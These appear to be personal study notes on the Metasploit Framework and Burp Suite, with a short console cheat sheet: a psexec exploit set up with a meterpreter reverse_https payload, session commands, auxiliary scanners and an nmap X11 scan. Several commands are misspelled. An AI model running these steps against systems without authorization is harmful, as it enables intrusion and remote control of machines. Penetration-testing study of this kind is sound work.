Metasploit

Sep 25, 2019
Apr 22, 2020

Metasploit

a tool for developing and executing exploit code against a remote target machine
The Metasploit Project includes anti-forensic¹ and evasion tools
Source code²
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

IDS - Intrusion Detection System

Monitors a network or a stystem for vurnabilities or malicious activities

snort, suricata

[ metasploit v5.0.46-dev                          ]
[ 1921 exploits - 1075 auxiliary - 330 post       ]
[ 556 payloads - 45 encoders - 10 nops            ]
[ 4 evasion                                       ]

info explot/windows/smb/psexec
use explot/windows/smb/psexec
show options
set PAYLOAD windows/meterpreter/reverse_https
set LPORT 443
exploit -h
explott -j
run           # to run auxillary scans
sessions
session -i 1  # run any ruby code in context
load          # loads plugins from metasploit

# Searching exploits
search
use
options
set verbose true

use auxiliary/scanner/ssh/ssh_version use auxiliary/scanner/http/docker_version

use auxiliary/scanner/x11/open_x11 nmap -p 6000 –script=x11-access 192.168.121.²²⁰⁄₂₄

Find out SSH version you are runnugn

apt show ssh
ssh -v localhost
ssh -V

Exploits and Scans

Reverse Shells
- https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit
FTP Sniffing
Linux Provilage Escalation³

Burp Suite

interception proxy tool
website Scanning
Documentation⁴
setup local http://localhost:8888/dvwa/login.php
Setup the Porxy
Intruders
- Dictionary⁵ and brute force attacks⁶
Repeater
- sending same request with multiple params
Decoder - crypto
- SHA, MD5, base64
- Smart decode, to decode passwords

Intercepting requests on localhost

about:config
Type the following into Firefox address bar 'about:config'
Type the following settings 'network.security.ports.banned.override'
Enter your port number '6666'

http://burp/

Metasploit

Metasploit

Exploits and Scans

Burp Suite

Footnotes